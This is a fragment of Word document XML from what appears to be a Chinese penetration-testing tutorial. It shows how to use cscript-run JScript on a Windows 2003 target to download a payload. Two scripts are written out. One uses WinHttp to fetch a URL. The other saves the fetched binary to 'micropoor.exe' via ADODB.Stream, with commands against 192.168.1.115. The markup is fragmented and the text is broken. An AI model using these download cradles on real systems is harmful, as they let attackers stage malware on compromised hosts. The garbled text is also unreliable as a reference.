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285.600pt;width:449.400pt;height:205.8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38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全版本都会默认支持js，并且通过cscript来调用达到下载payload的目的。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8452" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="27"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：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2003</w:t>
      </w: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读取：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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\test&gt;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cscript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/nologo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downfile.js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3783"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>http://192.168.1.115/robots.txt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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码：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120" w:right="2682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var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WinHttpReq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=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new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ActiveXObject("WinHttp.WinHttpRequest.5.1");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WinHttpReq.Open("GET",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WScript.Arguments(0),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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/*async=*/false);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inHttpReq.Send();</w:t>
      </w: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WScript.Echo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(WinHttpReq.ResponseText);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写入：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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\test&gt;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cscript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/nologo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dowfile2.js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3783"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>http://192.168.1.115/robots.txt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99.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:207.6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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码：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120" w:right="2682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var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WinHttpReq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=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new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ActiveXObject("WinHttp.WinHttpRequest.5.1");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WinHttpReq.Open("GET",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WScript.Arguments(0),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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/*async=*/false);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inHttpReq.Send();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="4873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BinStream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=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new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ActiveXObject("ADODB.Stream");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BinStream.Type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=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1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5519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BinStream.Open(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);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BinStream.Write(WinHttpReq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.ResponseBody);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B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inStream.SaveToFile("micropoor.exe");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后者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的话：简单，易用，轻便。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